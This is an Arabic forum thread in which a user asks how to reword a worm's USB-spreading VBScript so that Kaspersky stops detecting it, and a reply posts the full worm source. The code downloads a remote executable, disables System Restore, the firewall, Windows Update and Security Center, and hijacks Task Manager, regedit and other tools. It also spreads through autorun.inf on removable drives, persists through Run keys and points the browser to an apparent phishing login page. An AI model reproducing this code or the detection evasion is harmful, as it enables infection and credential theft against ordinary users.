[ Visual Basic 6 ] استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك

تم تحميل الصفحة في 0,8781856 ثانية
استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك
الحالة
مغلق و غير مفتوح للمزيد من الردود.
إنضم
1 مارس 2009
المشاركات
265
الإعجابات
233
النقاط
43
السلام عليكم

إخواني أنا أريد المساعدة في هذا الامر

هناك امر بالفيجوال بيسيك هذا أمر واحد من الاوامر التي تكون الدودة

وهو الامر الذي يقوم بنسخ الدودة system32 الى usb disk

وهذا هو الأمر

set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.attributes = 39
do
for each flashdrive in fs.drives

وأنا أريد الأمر الذي يطابق الأمر

do

لأن هذا الامر مكشوف من الكاسبر في تشفير الدودة

الرجاء مساعدة ذوي الخبرة
 
إنضم
3 نوفمبر 2007
المشاركات
3,614
الإعجابات
686
النقاط
113
رد: استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك

والله اخوي مافهمت عليك ياليت توضح .,؟؟؟ تبي تدمج اممرين في امر واحد او كيف ؟
 
إنضم
1 مارس 2009
المشاركات
265
الإعجابات
233
النقاط
43
رد: استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك

لا يا أخي أبحث عن امر يعوض الامر

do

اذا كان فيه امر يعوض هذا الاهمر او كلمة تعوض هذه الكلمة
 
إنضم
4 يوليو 2009
المشاركات
1,405
الإعجابات
247
النقاط
63
رد: استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك

السلام عليكم

إخواني أنا أريد المساعدة في هذا الامر

هناك امر بالفيجوال بيسيك هذا أمر واحد من الاوامر التي تكون الدودة

وهو الامر الذي يقوم بنسخ الدودة system32 الى usb disk

وهذا هو الأمر

set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.attributes = 39
do
for each flashdrive in fs.drives

وأنا أريد الأمر الذي يطابق الأمر

do

لأن هذا الامر مكشوف من الكاسبر في تشفير الدودة

الرجاء مساعدة ذوي الخبرة

السلام عليكم اخوي labgaa


كان عندي تدخل بسيط بالنسبه لي كلمة do لا علاقه بي انتي فيروس

do....loop

اتمنى لك التوفيق مع الدوده :32::32:
 
إنضم
4 يوليو 2009
المشاركات
1,405
الإعجابات
247
النقاط
63
رد: استفسار : تغيير امر بامر مشابه في الفيجوال بيسيك

كود:
'www.dev-point.com/vb
'karim-topten

strSource = "YOUR LINKE ex http://url/server.exe"
strDest = winpath & "\system32\win.exe"
Set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
Set Stream = CreateObject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.Type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.SaveToFile strDest, adSaveCreateOverWrite
Set Stream = Nothing
Set HTTP = Nothing
On Error Resume Next
Dim mysource, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd
'===========================================karim_topten========================================
atr = "[autorun]" & vbCrLf & "[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]lexecute=Wscript.exe /e:vbs winfile.jpg"
'===========================================karim_topten========================================
Set fs = CreateObject("Scripting.FileSystemObject")
Set mf = fs.getfile(Wscript.ScriptFullname)
Set reg = CreateObject("WScript.[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l")
Dim text, size
size = mf.size
check = mf.Drive.drivetype
Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream
mysource = mysource & text.readline
mysource = mysource & vbCrLf
Loop
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\system32\win.exe"): tf.Attributes = 32
'===========================================karim_topten========================================
strSource = "your links.exe"
strDest = winpath & "\system32\win.exe"
Set HTTP = CreateObject("Microsoft.XMLHTTP")
HTTP.open "GET", strSource, False
HTTP.send
Set Stream = CreateObject("adodb.stream")
Const adTypeBinary = 1
Const adSaveCreateNotExist = 1
Const adSaveCreateOverWrite = 2
Stream.Type = adTypeBinary
Stream.open
Stream.write HTTP.responseBody
Stream.SaveToFile strDest, adSaveCreateOverWrite
Set Stream = Nothing
Set HTTP = Nothing
'===========================================karim_totpen========================================
resultat = reg.regread("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\mp3file\DefaultIcon\")
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Vbsfile\DefaultIcon\", resultat
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer\LimitSystemRestoreCheckpointing", "1", "REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR", "1", "REG_DWORD"
reg.regwrite "HKEY_CLASSES_ROOT\VBSFile\FriendlyTypeName", "MP3 Audio", "REG_SZ"
reg.regwrite "HKEY_CLASSES_ROOT\mp3file\FriendlyTypeName", "Good Songs", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEMCurrentControlSet\Services\SharedAccess\Start", 4, "REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Start", 4, "REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start", 4, "REG_DWORD"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\AntiVirusOverride", 1, "REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\DisplayLogo", 0, "REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings\Timeout", 0, "REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\DisplayLogo", 0, "REG_DWORD"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD"
reg.regwrite "HKEY_CLASSES_ROOT\exefile\[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l\Scan for virus,s\command\", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_CLASSES_ROOT\exefile\[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l\Open application\command\", winpath & "\system32\win.exe", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\drwtsn32.exe\Debugger", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dwwin.exe\Debugger", winpath & "\system32\win.exe", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSConfig.exe\Debugger", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
reg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\Debugger", win & "\win.exe", "REG_SZ"
'===========================================X4X========================================
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.Attributes = 32
Set tf = fs.createtextfile(winpath & "\system32\winjpg.jpg", 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(winpath & "\system32\winjpg.jpg")
tf.Attributes = 39
'===========================================karim_topten========================================
Do
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
Set tf = fs.getfile(flashdrive.Path & "\winfile.jpg")
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & "\winfile.jpg", 2, True)
tf.write mysource
tf.Close
Set tf = fs.getfile(flashdrive.Path & "\winfile.jpg")
tf.Attributes = 39
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 32
Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True)
tf.write atr
tf.Close
Set tf = fs.getfile(flashdrive.Path & "\autorun.inf")
tf.Attributes = 39
End If
'===========================================karim_topten========================================
Next
Set rg = CreateObject("WScript.[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l")
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\regdiit", winpath & "\system32\win.exe"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled", 1, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 0, "REG_DWORD"
rg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", 1, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "   .-~= Hacked by X4X =~-.  "
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.free[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]town.com/alrefai/login.live.html"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\CTFMON", winpath & "\system32\wscript.exe /E:vbs " & winpath & "\system32\winjpg.jpg", "REG_SZ"
rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\winboot"
rg.RegDelete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
If check <> 1 Then
Wscript.sleep 5000
End If
Loop While check <> 1
Set sd = CreateObject("Wscript.[B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B][B][COLOR="Red"]*[/COLOR][/B]l")
sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.

الأعضاء النشطين حاليآ الذين يشاهدون هذا الموضوع (1 عضو و 0 ضيف)

خيارات الاستايل

نوع الخط
مودك
اخفاء السايدر بار OFF
توسيط المنتدى OFF
فصل الأقسام OFF
الأقسام الفرعية OFF
عرض المشاركات
حجم الخط
معلومات العضو OFF
إخفاء التوقيع OFF

إرجاع خيارات الإستايل